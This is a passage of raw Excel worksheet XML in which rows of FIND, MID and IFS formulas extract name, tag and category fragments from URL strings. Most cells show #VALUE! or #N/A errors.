        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E324" t="e" cm="1">
        <f t="array" ref="E324">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A324)), MID($A324, FIND("name=",$A324) + 5, LEN($A324) - FIND("name=",$A324)),
    ISNUMBER(FIND("tag/",$A324)), MID($A324, FIND("tag/",$A324) + 4, LEN($A324) - FIND("tag/",$A324)),
    ISNUMBER(FIND("category",$A324)), MID($A324, FIND("category",$A324) + 9, LEN($A324) - FIND("category",$A324)))</f>
        <v>#N/A</v>
      </c>
      <c r="F324" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="325" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A325" t="s">
        <v>2365</v>
      </c>
      <c r="B325" t="e">
        <f t="shared" si="13"/>
        <v>#VALUE!</v>
      </c>
      <c r="C325" t="e">
        <f t="shared" si="14"/>
        <v>#VALUE!</v>
      </c>
      <c r="D325" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E325" t="e" cm="1">
        <f t="array" ref="E325">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A325)), MID($A325, FIND("name=",$A325) + 5, LEN($A325) - FIND("name=",$A325)),
    ISNUMBER(FIND("tag/",$A325)), MID($A325, FIND("tag/",$A325) + 4, LEN($A325) - FIND("tag/",$A325)),
    ISNUMBER(FIND("category",$A325)), MID($A325, FIND("category",$A325) + 9, LEN($A325) - FIND("category",$A325)))</f>
        <v>#N/A</v>
      </c>
      <c r="F325" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="326" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A326" t="s">
        <v>2248</v>
      </c>
      <c r="B326" t="e">
        <f t="shared" ref="B326:B389" si="16">IF(FIND("name=",A326,1)&gt;0,MID(A326,FIND("name=",A326,1)+5,LEN(A326)-FIND("name=",A326,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="C326" t="e">
        <f t="shared" ref="C326:C389" si="17">IF(FIND("tag/",$A326,1)&gt;0,MID($A326,FIND("tag/",$A326,1)+4,LEN($A326)-FIND("tag/",$A326,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="D326" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E326" t="e" cm="1">
        <f t="array" ref="E326">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A326)), MID($A326, FIND("name=",$A326) + 5, LEN($A326) - FIND("name=",$A326)),
    ISNUMBER(FIND("tag/",$A326)), MID($A326, FIND("tag/",$A326) + 4, LEN($A326) - FIND("tag/",$A326)),
    ISNUMBER(FIND("category",$A326)), MID($A326, FIND("category",$A326) + 9, LEN($A326) - FIND("category",$A326)))</f>
        <v>#N/A</v>
      </c>
      <c r="F326" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="327" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A327" t="s">
        <v>2248</v>
      </c>
      <c r="B327" t="e">
        <f t="shared" si="16"/>
        <v>#VALUE!</v>
      </c>
      <c r="C327" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D327" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E327" t="e" cm="1">
        <f t="array" ref="E327">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A327)), MID($A327, FIND("name=",$A327) + 5, LEN($A327) - FIND("name=",$A327)),
    ISNUMBER(FIND("tag/",$A327)), MID($A327, FIND("tag/",$A327) + 4, LEN($A327) - FIND("tag/",$A327)),
    ISNUMBER(FIND("category",$A327)), MID($A327, FIND("category",$A327) + 9, LEN($A327) - FIND("category",$A327)))</f>
        <v>#N/A</v>
      </c>
      <c r="F327" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="328" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A328" t="s">
        <v>2270</v>
      </c>
      <c r="B328" t="e">
        <f t="shared" si="16"/>
        <v>#VALUE!</v>
      </c>
      <c r="C328" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D328" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E328" t="e" cm="1">
        <f t="array" ref="E328">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A328)), MID($A328, FIND("name=",$A328) + 5, LEN($A328) - FIND("name=",$A328)),
    ISNUMBER(FIND("tag/",$A328)), MID($A328, FIND("tag/",$A328) + 4, LEN($A328) - FIND("tag/",$A328)),
    ISNUMBER(FIND("category",$A328)), MID($A328, FIND("category",$A328) + 9, LEN($A328) - FIND("category",$A328)))</f>
        <v>#N/A</v>
      </c>
      <c r="F328" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="329" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A329" t="s">
        <v>2319</v>
      </c>
      <c r="B329" t="e">
        <f t="shared" si="16"/>
        <v>#VALUE!</v>
      </c>
      <c r="C329" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D329" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E329" t="e" cm="1">
        <f t="array" ref="E329">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A329)), MID($A329, FIND("name=",$A329) + 5, LEN($A329) - FIND("name=",$A329)),
    ISNUMBER(FIND("tag/",$A329)), MID($A329, FIND("tag/",$A329) + 4, LEN($A329) - FIND("tag/",$A329)),
    ISNUMBER(FIND("category",$A329)), MID($A329, FIND("category",$A329) + 9, LEN($A329) - FIND("category",$A329)))</f>
        <v>#N/A</v>
      </c>
      <c r="F329" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="330" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A330" t="s">
        <v>2319</v>
      </c>
      <c r="B330" t="e">
        <f t="shared" si="16"/>
        <v>#VALUE!</v>
      </c>
      <c r="C330" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D330" t="e">
        <f t="shared" si="15"/>
        <v>#VALUE!</v>
      </c>
      <c r="E330" t="e" cm="1">
        <f t="array" ref="E330">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A330)), MID($A330, FIND("name=",$A330) + 5, LEN($A330) - FIND("name=",$A330)),
    ISNUMBER(FIND("tag/",$A330)), MID($A330, FIND("tag/",$A330) + 4, LEN($A330) - FIND("tag/",$A330)),
    ISNUMBER(FIND("category",$A330)), MID($A330, FIND("category",$A330) + 9, LEN($A330) - FIND("category",$A330)))</f>
        <v>#N/A</v>
      </c>
      <c r="F330" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="331" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A331" t="s">
        <v>2308</v>
      </c>
      <c r="B331" t="e">
        <f t="shared" si="16"/>
        <v>#VALUE!</v>
      </c>
      <c r="C331" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D331" t="e">
        <f t="shared" ref="D331:D394" si="18">IF(FIND("category",$A331,1)&gt;0,MID($A331,FIND("category",$A331,1)+9,LEN($A331)-FIND("category",$A331,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="E331" t="e" cm="1">
        <f t="array" ref="E331">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A331)), MID($A331, FIND("name=",$A331) + 5, LEN($A331) - FIND("name=",$A331)),
    ISNUMBER(FIND("tag/",$A331)), MID($A331, FIND("tag/",$A331) + 4, LEN($A331) - FIND("tag/",$A331)),
    ISNUMBER(FIND("category",$A331)), MID($A331, FIND("category",$A331) + 9, LEN($A331) - FIND("category",$A331)))</f>
        <v>#N/A</v>
      </c>
      <c r="F331" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="332" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A332" t="s">
        <v>2248</v>
      </c>
      <c r="B332" t="e">
        <f t="shared" si="16"/>
        <v>#VALUE!</v>
      </c>
      <c r="C332" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D332" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E332" t="e" cm="1">
        <f t="array" ref="E332">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A332)), MID($A332, FIND("name=",$A332) + 5, LEN($A332) - FIND("name=",$A332)),
    ISNUMBER(FIND("tag/",$A332)), MID($A332, FIND("tag/",$A332) + 4, LEN($A332) - FIND("tag/",$A332)),
    ISNUMBER(FIND("category",$A332)), MID($A332, FIND("category",$A332) + 9, LEN($A332) - FIND("category",$A332)))</f>
        <v>#N/A</v>
      </c>
      <c r="F332" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="333" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A333" t="s">
        <v>2308</v>
      </c>
      <c r="B333" t="e">
        <f t="shared" si="16"/>
        <v>#VALUE!</v>
      </c>
      <c r="C333" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D333" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E333" t="e" cm="1">
        <f t="array" ref="E333">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A333)), MID($A333, FIND("name=",$A333) + 5, LEN($A333) - FIND("name=",$A333)),
    ISNUMBER(FIND("tag/",$A333)), MID($A333, FIND("tag/",$A333) + 4, LEN($A333) - FIND("tag/",$A333)),
    ISNUMBER(FIND("category",$A333)), MID($A333, FIND("category",$A333) + 9, LEN($A333) - FIND("category",$A333)))</f>
        <v>#N/A</v>
      </c>
      <c r="F333" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="334" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A334" t="s">
        <v>2248</v>
      </c>
      <c r="B334" t="e">
        <f t="shared" si="16"/>
        <v>#VALUE!</v>
      </c>
      <c r="C334" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D334" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E334" t="e" cm="1">
        <f t="array" ref="E334">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A334)), MID($A334, FIND("name=",$A334) + 5, LEN($A334) - FIND("name=",$A334)),
    ISNUMBER(FIND("tag/",$A334)), MID($A334, FIND("tag/",$A334) + 4, LEN($A334) - FIND("tag/",$A334)),
    ISNUMBER(FIND("category",$A334)), MID($A334, FIND("category",$A334) + 9, LEN($A334) - FIND("category",$A334)))</f>
        <v>#N/A</v>
      </c>
      <c r="F334" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="335" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A335" t="s">
        <v>2268</v>
      </c>
      <c r="B335" t="str">
        <f t="shared" si="16"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C335" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D335" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E335" t="str" cm="1">
        <f t="array" ref="E335">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A335)), MID($A335, FIND("name=",$A335) + 5, LEN($A335) - FIND("name=",$A335)),
    ISNUMBER(FIND("tag/",$A335)), MID($A335, FIND("tag/",$A335) + 4, LEN($A335) - FIND("tag/",$A335)),
    ISNUMBER(FIND("category",$A335)), MID($A335, FIND("category",$A335) + 9, LEN($A335) - FIND("category",$A335)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F335" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="336" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A336" t="s">
        <v>2268</v>
      </c>
      <c r="B336" t="str">
        <f t="shared" si="16"/>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="C336" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D336" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E336" t="str" cm="1">
        <f t="array" ref="E336">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A336)), MID($A336, FIND("name=",$A336) + 5, LEN($A336) - FIND("name=",$A336)),
    ISNUMBER(FIND("tag/",$A336)), MID($A336, FIND("tag/",$A336) + 4, LEN($A336) - FIND("tag/",$A336)),
    ISNUMBER(FIND("category",$A336)), MID($A336, FIND("category",$A336) + 9, LEN($A336) - FIND("category",$A336)))</f>
        <v>Rimpi%2031&amp;date=2023-11-05</v>
      </c>
      <c r="F336" t="s">
        <v>3306</v>
      </c>
    </row>
    <row r="337" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A337" t="s">
        <v>2366</v>
      </c>
      <c r="B337" t="str">
        <f t="shared" si="16"/>
        <v>Dounia&amp;date=2024-06-05</v>
      </c>
      <c r="C337" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D337" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E337" t="str" cm="1">
        <f t="array" ref="E337">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A337)), MID($A337, FIND("name=",$A337) + 5, LEN($A337) - FIND("name=",$A337)),
    ISNUMBER(FIND("tag/",$A337)), MID($A337, FIND("tag/",$A337) + 4, LEN($A337) - FIND("tag/",$A337)),
    ISNUMBER(FIND("category",$A337)), MID($A337, FIND("category",$A337) + 9, LEN($A337) - FIND("category",$A337)))</f>
        <v>Dounia&amp;date=2024-06-05</v>
      </c>
      <c r="F337" t="s">
        <v>3343</v>
      </c>
    </row>
    <row r="338" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A338" t="s">
        <v>2366</v>
      </c>
      <c r="B338" t="str">
        <f t="shared" si="16"/>
        <v>Dounia&amp;date=2024-06-05</v>
      </c>
      <c r="C338" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D338" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E338" t="str" cm="1">
        <f t="array" ref="E338">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A338)), MID($A338, FIND("name=",$A338) + 5, LEN($A338) - FIND("name=",$A338)),
    ISNUMBER(FIND("tag/",$A338)), MID($A338, FIND("tag/",$A338) + 4, LEN($A338) - FIND("tag/",$A338)),
    ISNUMBER(FIND("category",$A338)), MID($A338, FIND("category",$A338) + 9, LEN($A338) - FIND("category",$A338)))</f>
        <v>Dounia&amp;date=2024-06-05</v>
      </c>
      <c r="F338" t="s">
        <v>3343</v>
      </c>
    </row>
    <row r="339" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A339" t="s">
        <v>2366</v>
      </c>
      <c r="B339" t="str">
        <f t="shared" si="16"/>
        <v>Dounia&amp;date=2024-06-05</v>
      </c>
      <c r="C339" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D339" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E339" t="str" cm="1">
        <f t="array" ref="E339">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A339)), MID($A339, FIND("name=",$A339) + 5, LEN($A339) - FIND("name=",$A339)),
    ISNUMBER(FIND("tag/",$A339)), MID($A339, FIND("tag/",$A339) + 4, LEN($A339) - FIND("tag/",$A339)),
    ISNUMBER(FIND("category",$A339)), MID($A339, FIND("category",$A339) + 9, LEN($A339) - FIND("category",$A339)))</f>
        <v>Dounia&amp;date=2024-06-05</v>
      </c>
      <c r="F339" t="s">
        <v>3343</v>
      </c>
    </row>
    <row r="340" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A340" t="s">
        <v>2366</v>
      </c>
      <c r="B340" t="str">
        <f t="shared" si="16"/>
        <v>Dounia&amp;date=2024-06-05</v>
      </c>
      <c r="C340" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D340" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E340" t="str" cm="1">
        <f t="array" ref="E340">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A340)), MID($A340, FIND("name=",$A340) + 5, LEN($A340) - FIND("name=",$A340)),
    ISNUMBER(FIND("tag/",$A340)), MID($A340, FIND("tag/",$A340) + 4, LEN($A340) - FIND("tag/",$A340)),
    ISNUMBER(FIND("category",$A340)), MID($A340, FIND("category",$A340) + 9, LEN($A340) - FIND("category",$A340)))</f>
        <v>Dounia&amp;date=2024-06-05</v>
      </c>
      <c r="F340" t="s">
        <v>3343</v>
      </c>
    </row>
    <row r="341" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A341" t="s">
        <v>2366</v>
      </c>
      <c r="B341" t="str">
        <f t="shared" si="16"/>
        <v>Dounia&amp;date=2024-06-05</v>
      </c>
      <c r="C341" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D341" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E341" t="str" cm="1">
        <f t="array" ref="E341">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A341)), MID($A341, FIND("name=",$A341) + 5, LEN($A341) - FIND("name=",$A341)),
    ISNUMBER(FIND("tag/",$A341)), MID($A341, FIND("tag/",$A341) + 4, LEN($A341) - FIND("tag/",$A341)),
    ISNUMBER(FIND("category",$A341)), MID($A341, FIND("category",$A341) + 9, LEN($A341) - FIND("category",$A341)))</f>
        <v>Dounia&amp;date=2024-06-05</v>
      </c>
      <c r="F341" t="s">
        <v>3343</v>
      </c>
    </row>
    <row r="342" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A342" t="s">
        <v>2366</v>
      </c>
      <c r="B342" t="str">
        <f t="shared" si="16"/>
        <v>Dounia&amp;date=2024-06-05</v>
      </c>
      <c r="C342" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D342" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E342" t="str" cm="1">
        <f t="array" ref="E342">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A342)), MID($A342, FIND("name=",$A342) + 5, LEN($A342) - FIND("name=",$A342)),
    ISNUMBER(FIND("tag/",$A342)), MID($A342, FIND("tag/",$A342) + 4, LEN($A342) - FIND("tag/",$A342)),
    ISNUMBER(FIND("category",$A342)), MID($A342, FIND("category",$A342) + 9, LEN($A342) - FIND("category",$A342)))</f>
        <v>Dounia&amp;date=2024-06-05</v>
      </c>
      <c r="F342" t="s">
        <v>3343</v>
      </c>
    </row>
    <row r="343" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A343" t="s">
        <v>2366</v>
      </c>
      <c r="B343" t="str">
        <f t="shared" si="16"/>
        <v>Dounia&amp;date=2024-06-05</v>
      </c>
      <c r="C343" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D343" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E343" t="str" cm="1">
        <f t="array" ref="E343">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A343)), MID($A343, FIND("name=",$A343) + 5, LEN($A343) - FIND("name=",$A343)),
    ISNUMBER(FIND("tag/",$A343)), MID($A343, FIND("tag/",$A343) + 4, LEN($A343) - FIND("tag/",$A343)),
    ISNUMBER(FIND("category",$A343)), MID($A343, FIND("category",$A343) + 9, LEN($A343) - FIND("category",$A343)))</f>
        <v>Dounia&amp;date=2024-06-05</v>
      </c>
      <c r="F343" t="s">
        <v>3343</v>
      </c>
    </row>
    <row r="344" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A344" t="s">
        <v>2366</v>
      </c>
      <c r="B344" t="str">
        <f t="shared" si="16"/>
        <v>Dounia&amp;date=2024-06-05</v>
      </c>
      <c r="C344" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D344" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E344" t="str" cm="1">
        <f t="array" ref="E344">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A344)), MID($A344, FIND("name=",$A344) + 5, LEN($A344) - FIND("name=",$A344)),
    ISNUMBER(FIND("tag/",$A344)), MID($A344, FIND("tag/",$A344) + 4, LEN($A344) - FIND("tag/",$A344)),
    ISNUMBER(FIND("category",$A344)), MID($A344, FIND("category",$A344) + 9, LEN($A344) - FIND("category",$A344)))</f>
        <v>Dounia&amp;date=2024-06-05</v>
      </c>
      <c r="F344" t="s">
        <v>3343</v>
      </c>
    </row>
    <row r="345" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A345" t="s">
        <v>2367</v>
      </c>
      <c r="B345" t="e">
        <f t="shared" si="16"/>
        <v>#VALUE!</v>
      </c>
      <c r="C345" t="str">
        <f t="shared" si="17"/>
        <v>%E0%B2%95%E0%B3%8D%E0%B2%AF%E0%B2%BE%E0%B2%82%E0%B2%A1%E0%B2%BF%E0%B2%B8%E0%B3%8D-%E0%B2%B9%E0%B2%AB%E0%B3%80%E0%B2%A8%E0%B3%8D/</v>
      </c>
      <c r="D345" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E345" t="str" cm="1">
        <f t="array" ref="E345">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A345)), MID($A345, FIND("name=",$A345) + 5, LEN($A345) - FIND("name=",$A345)),
    ISNUMBER(FIND("tag/",$A345)), MID($A345, FIND("tag/",$A345) + 4, LEN($A345) - FIND("tag/",$A345)),
    ISNUMBER(FIND("category",$A345)), MID($A345, FIND("category",$A345) + 9, LEN($A345) - FIND("category",$A345)))</f>
        <v>%E0%B2%95%E0%B3%8D%E0%B2%AF%E0%B2%BE%E0%B2%82%E0%B2%A1%E0%B2%BF%E0%B2%B8%E0%B3%8D-%E0%B2%B9%E0%B2%AB%E0%B3%80%E0%B2%A8%E0%B3%8D/</v>
      </c>
      <c r="F345" t="s">
        <v>3344</v>
      </c>
    </row>
    <row r="346" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A346" t="s">
        <v>2256</v>
      </c>
      <c r="B346" t="e">
        <f t="shared" si="16"/>
        <v>#VALUE!</v>
      </c>
      <c r="C346" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D346" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E346" t="e" cm="1">
        <f t="array" ref="E346">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A346)), MID($A346, FIND("name=",$A346) + 5, LEN($A346) - FIND("name=",$A346)),
    ISNUMBER(FIND("tag/",$A346)), MID($A346, FIND("tag/",$A346) + 4, LEN($A346) - FIND("tag/",$A346)),
    ISNUMBER(FIND("category",$A346)), MID($A346, FIND("category",$A346) + 9, LEN($A346) - FIND("category",$A346)))</f>
        <v>#N/A</v>
      </c>
      <c r="F346" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="347" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A347" t="s">
        <v>2248</v>
      </c>
      <c r="B347" t="e">
        <f t="shared" si="16"/>
        <v>#VALUE!</v>
      </c>
      <c r="C347" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D347" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E347" t="e" cm="1">
        <f t="array" ref="E347">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A347)), MID($A347, FIND("name=",$A347) + 5, LEN($A347) - FIND("name=",$A347)),
    ISNUMBER(FIND("tag/",$A347)), MID($A347, FIND("tag/",$A347) + 4, LEN($A347) - FIND("tag/",$A347)),
    ISNUMBER(FIND("category",$A347)), MID($A347, FIND("category",$A347) + 9, LEN($A347) - FIND("category",$A347)))</f>
        <v>#N/A</v>
      </c>
      <c r="F347" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="348" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A348" t="s">
        <v>2368</v>
      </c>
      <c r="B348" t="e">
        <f t="shared" si="16"/>
        <v>#VALUE!</v>
      </c>
      <c r="C348" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D348" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E348" t="e" cm="1">
        <f t="array" ref="E348">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A348)), MID($A348, FIND("name=",$A348) + 5, LEN($A348) - FIND("name=",$A348)),
    ISNUMBER(FIND("tag/",$A348)), MID($A348, FIND("tag/",$A348) + 4, LEN($A348) - FIND("tag/",$A348)),
    ISNUMBER(FIND("category",$A348)), MID($A348, FIND("category",$A348) + 9, LEN($A348) - FIND("category",$A348)))</f>
        <v>#N/A</v>
      </c>
      <c r="F348" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="349" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A349" t="s">
        <v>2369</v>
      </c>
      <c r="B349" t="e">
        <f t="shared" si="16"/>
        <v>#VALUE!</v>
      </c>
      <c r="C349" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D349" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E349" t="e" cm="1">
        <f t="array" ref="E349">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A349)), MID($A349, FIND("name=",$A349) + 5, LEN($A349) - FIND("name=",$A349)),
    ISNUMBER(FIND("tag/",$A349)), MID($A349, FIND("tag/",$A349) + 4, LEN($A349) - FIND("tag/",$A349)),
    ISNUMBER(FIND("category",$A349)), MID($A349, FIND("category",$A349) + 9, LEN($A349) - FIND("category",$A349)))</f>
        <v>#N/A</v>
      </c>
      <c r="F349" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="350" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A350" t="s">
        <v>2368</v>
      </c>
      <c r="B350" t="e">
        <f t="shared" si="16"/>
        <v>#VALUE!</v>
      </c>
      <c r="C350" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D350" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E350" t="e" cm="1">
        <f t="array" ref="E350">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A350)), MID($A350, FIND("name=",$A350) + 5, LEN($A350) - FIND("name=",$A350)),
    ISNUMBER(FIND("tag/",$A350)), MID($A350, FIND("tag/",$A350) + 4, LEN($A350) - FIND("tag/",$A350)),
    ISNUMBER(FIND("category",$A350)), MID($A350, FIND("category",$A350) + 9, LEN($A350) - FIND("category",$A350)))</f>
        <v>#N/A</v>
      </c>
      <c r="F350" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="351" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A351" t="s">
        <v>2369</v>
      </c>
      <c r="B351" t="e">
        <f t="shared" si="16"/>
        <v>#VALUE!</v>
      </c>
      <c r="C351" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D351" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E351" t="e" cm="1">
        <f t="array" ref="E351">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A351)), MID($A351, FIND("name=",$A351) + 5, LEN($A351) - FIND("name=",$A351)),
    ISNUMBER(FIND("tag/",$A351)), MID($A351, FIND("tag/",$A351) + 4, LEN($A351) - FIND("tag/",$A351)),
    ISNUMBER(FIND("category",$A351)), MID($A351, FIND("category",$A351) + 9, LEN($A351) - FIND("category",$A351)))</f>
        <v>#N/A</v>
      </c>
      <c r="F351" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="352" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A352" t="s">
        <v>2370</v>
      </c>
      <c r="B352" t="e">
        <f t="shared" si="16"/>
        <v>#VALUE!</v>
      </c>
      <c r="C352" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D352" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E352" t="e" cm="1">
        <f t="array" ref="E352">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A352)), MID($A352, FIND("name=",$A352) + 5, LEN($A352) - FIND("name=",$A352)),
    ISNUMBER(FIND("tag/",$A352)), MID($A352, FIND("tag/",$A352) + 4, LEN($A352) - FIND("tag/",$A352)),
    ISNUMBER(FIND("category",$A352)), MID($A352, FIND("category",$A352) + 9, LEN($A352) - FIND("category",$A352)))</f>
        <v>#N/A</v>
      </c>
      <c r="F352" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="353" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A353" t="s">
        <v>2371</v>
      </c>
      <c r="B353" t="e">
        <f t="shared" si="16"/>
        <v>#VALUE!</v>
      </c>
      <c r="C353" t="e">
        <f t="shared" si="17"/>
        <v>#VALUE!</v>
      </c>
      <c r="D353" t="e">
        <f t="shared" si="18"/>
        <v>#VALUE!</v>
      </c>
      <c r="E353" t="e" cm="1">
        <f t="array" ref="E353">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A353)), MID($A353, FIND("name=",$A353) + 5, LEN($A353) - FIND("name=",$A353)),
    ISNUMBER(FIND("tag/",$A353)), MID($A353, FIND("tag/",$A353) + 4, LEN($A353) - FIND("tag/",$A353)),
